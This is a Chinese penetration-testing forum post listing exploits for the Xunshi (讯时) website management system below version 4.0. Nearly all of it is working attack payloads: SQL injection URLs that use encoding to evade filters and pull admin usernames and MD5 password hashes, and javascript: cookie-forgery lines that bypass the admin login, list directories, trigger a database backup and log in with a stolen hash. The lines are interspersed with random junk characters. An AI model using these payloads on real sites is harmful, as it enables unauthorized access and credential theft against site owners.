中国网络渗透测试联盟

标题: 讯时网站管理系统4.0以下漏洞 [打印本页]

作者: admin    时间: 2016-5-11 14:55
标题: 讯时网站管理系统4.0以下漏洞
一、注入
) |- t/ ?5 K9 K  ^1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
# @+ j9 m- t* q% |  [
( B3 N+ k, {" u  x% n# g, ?' C2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp" 0 f& N2 H8 S2 u) v
第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
0 N; c7 h8 {+ m. \9 k可得到用户名和MD5加密码的密码。
  W( I$ s3 y+ B* X( i& Q. d! x' r& r9 D% z
二、cookies欺骗9 q# U# O. Z3 e& {9 `
: y; P. ^6 r4 \  c! A( e5 N* @
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞. 0 R) a( g5 O6 l  S
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"$ H8 h" u1 ]8 L- b0 w( Y9 t; v- Q
% p7 _  X, O2 J8 Z( o
2、列目录.
0 L) }8 Z" x  w/ @$ Gjavascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
: I2 S) I* c  B# y! g* r
3 R1 h4 }# c+ d5 O; L. A6 c" S. B3、数据库备份(适用性好像比较低.)
: \' O9 h3 S& f) Ejavascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"- S( r; ^, h& Q3 Z' E
7 J, T5 K1 W" m
4、得到MD5密码解不了密进后台方法$ q  J+ W9 T8 D: @' M% {: m7 b
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
9 ?. f! }8 Q  f) s# |* Q  X# _




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2